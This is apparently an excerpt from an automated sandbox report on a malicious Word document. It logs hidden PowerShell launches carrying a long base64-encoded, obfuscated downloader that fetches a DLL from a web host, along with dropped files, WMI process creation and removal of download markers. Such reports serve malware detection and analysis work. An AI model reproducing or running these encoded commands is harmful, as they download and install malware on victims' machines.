Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK	Jump to behavior

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK			Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000905B push ecx; ret	7_2_1000906E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000E3C5 push ecx; ret	7_2_1000E3D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001BCE92 push cs; retf	7_2_001BCE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FCE92 push cs; retf	10_2_001FCE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0030CE92 push cs; retf	11_2_0030CE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001CCE92 push cs; retf	13_2_001CCE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_001ACE92 push cs; retf	15_2_001ACE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_0020CE92 push cs; retf	18_2_0020CE94

Persistence and Installation Behavior:

Creates processes via WMI

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Drops PE files

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll

Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Yozs\bhycn.bcx

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Yozs\bhycn.bcx:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Hxqt\iieutea.ehw:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Yjfs\gmxhcr.dhy:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Hszr\zft.hxn:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Vnjt\awo.cnn:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Dkpu\lbsvbo.gas:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Opqf\zrop.pvh:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Blgp\gmlbr.kph:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Mnrm\xmfd.ucf:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Wnoc\mhxywle.szw:Zone.Identifier read attributes \| delete
